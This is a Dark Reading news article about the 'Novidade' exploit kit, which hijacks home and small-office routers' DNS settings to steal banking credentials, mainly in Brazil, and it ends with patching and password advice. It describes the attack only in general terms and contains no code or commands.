Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Attacks/Breaches

12/11/2018
05:20 PM
Connect Directly
Twitter
LinkedIn
RSS
E-Mail
100%
0%

Attackers Using New Exploit Kit to Hijack Home & Small Office Routers

Goal is to steal banking credentials by redirecting users to phishing sites.

Small and home office routers are becoming major targets for criminals seeking to steal banking and other online account credentials belonging to Internet users.

The latest indication of the trend is "Novidade," a dangerous new exploit kit that multiple attack groups appear to be using to target routers belonging to millions of users in Brazil and, to a lesser extent, other parts of the world.

The malware is being used to change Domain Name Service (DNS) settings on routers so all traffic through them is hijacked and routed to a malicious server. When users of Novidade-infected routers attempt to access certain target banks, for instance, their traffic is redirected to cloned versions of the login pages of the bank they are trying to access.

Security vendor Trend Micro has been tracking the threat for some time and estimates that one attack campaign alone has delivered Novidade at least 24 million times since March. Telemetry that the company has obtained suggests that attacks involving the malware may have begun in August 2017.

Most of the attacks have involved attempts to retrieve banking credentials from Internet users in Brazil. But some of the Novidade campaigns have involved targets in no specific geographic location, suggesting either that the attackers are expanding their efforts or that a large group of actors are using the kit, Trend Micro said in a report this week.

Attackers appear to have managed to compromise multiple router models using Novidade, Trend Micro said. Examples include D-Link's DSL-2740R and DIR 905L, Mediabridge's Medialink MWN-WAPR300, Motorola's SBG6580, and TP-Link's TL-WR340G and WR1043ND router models.

"The Novidade exploit kit is another proof point showing that attackers are shifting targets when attacking consumers," says Mark Nunnikhoven, Trend Micro's VP of cloud research. "This malware uses a foothold — your laptop or desktop — to attack the heart of the home network: your router."

By changing a router's DNS settings, attackers can attempt to compromise other devices or phishing credentials at the leisure, Nunnikhoven says.

Novidade is the second major instance in recent months of cybercriminals using malware to change DNS settings on small office and home office (SOHO) routers in order to steal user credentials and conduct other malicious activities.

In August, security vendor Radware reported DNS hijacking attempts targeting Brazilian users of D-Link DSL modems. By October, the campaign had exploded in scope to target users of nearly six-dozen router models in Brazil and elsewhere. China's Qihoo 360's Netlab team, which was the first to report on the increased scope, estimated that as many as 100,000 routers belonging mostly to users in Brazil had been compromised with versions of DNSChanger, a previously known router hijacking tool.

Earlier this year, the FBI warned of foreign cyber actors targeting SOHO routers with VPNFilter, a particularly pernicious malware tool capable of persisting through reboots and rendering infected routers unusable. VPNFilter is believed to have infected some 500,000 SOHO routers worldwide.

Trend Micro described attackers using a variety of methods to distribute Novidade. This includes malvertising, website injections, and instant messages using the 2018 Brazilian presidential elections as a lure. "Once the victim receives and clicks the link to Novidade, the landing page will initially perform several HTTP requests generated by JavaScript Image function to a predefined list of local IP address that are mostly used by routers," the vendor said.

If a connection is successfully established, Novidade then "blindly" attacks the IP address with all its exploits. Next, it tries to log in to the router using default account names and passwords, after which it executes an attack to change the router's DNS settings.

Trend Micro says it has observed a least three variants of Novidade being used in the various attack campaigns. All three variants are delivered the same way and attack routers in the same manner. However, the newer variants have capabilities that the initial variant released in August 2017 did not have.

"The second version of Novidade added obfuscation to the JavaScript component, making it more difficult to detect," Nunnikhoven says. "The third version, continue to refine that obfuscation technique and added the ability to detect the local IP address, setting up the possibility of highly targeted attacks."

The best way for users to mitigate their exposure to threats like Novidade is to ensure their routers have the latest firmware version and are properly patched. Users should also change default usernames and passwords, change the router's default IP address, and disable remote access features so an external actor cannot manipulate it, according to Trend Micro.

Malware like Novidade presents a threat mostly to consumers. In theory, the same conceptual attack could work against enterprises, Nunnikhoven notes. "[But] it's significantly more difficult given the separation of duties and layers of security controls around key assets like Dynamic Host Configuration Protocol (DHCP) servers and enterprise DNS resolution," he says.

Related Content:

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ... View Full Bio
 

Recommended Reading:

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
NSA Appoints Rob Joyce as Cyber Director
Dark Reading Staff 1/15/2021
Vulnerability Management Has a Data Problem
Tal Morgenstern, Co-Founder & Chief Product Officer, Vulcan Cyber,  1/14/2021
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Write a Caption, Win an Amazon Gift Card! Click Here
Latest Comment: This is not what I meant by "I would like to share some desk space"
Current Issue
2020: The Year in Security
Download this Tech Digest for a look at the biggest security stories that - so far - have shaped a very strange and stressful year.
Flash Poll
Assessing Cybersecurity Risk in Today's Enterprises
Assessing Cybersecurity Risk in Today's Enterprises
COVID-19 has created a new IT paradigm in the enterprise -- and a new level of cybersecurity risk. This report offers a look at how enterprises are assessing and managing cyber-risk under the new normal.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-28452
PUBLISHED: 2021-01-20
This affects the package com.softwaremill.akka-http-session:core_2.12 from 0 and before 0.6.1; all versions of package com.softwaremill.akka-http-session:core_2.11; the package com.softwaremill.akka-http-session:core_2.13 from 0 and before 0.6.1. CSRF protection can be bypassed by forging a request ...
CVE-2020-28483
PUBLISHED: 2021-01-20
This affects all versions of package github.com/gin-gonic/gin. When gin is exposed directly to the internet, a client's IP can be spoofed by setting the X-Forwarded-For header.
CVE-2021-21269
PUBLISHED: 2021-01-20
Keymaker is a Mastodon Community Finder based Matrix Community serverlist page Server. In Keymaker before version 0.2.0, the assets endpoint did not check for the extension. The rust `join` method without checking user input might have made it abe to do a Path Traversal attack causing to read more f...
CVE-2020-25686
PUBLISHED: 2021-01-20
A flaw was found in dnsmasq before version 2.83. When receiving a query, dnsmasq does not check for an existing pending request for the same name and forwards a new request. By default, a maximum of 150 pending queries can be sent to upstream servers, so there can be at most 150 queries for the same...
CVE-2020-25687
PUBLISHED: 2021-01-20
A flaw was found in dnsmasq before version 2.83. A heap-based buffer overflow was discovered in dnsmasq when DNSSEC is enabled and before it validates the received DNS entries. This flaw allows a remote attacker, who can create valid DNS replies, to cause an overflow in a heap-allocated memory. This...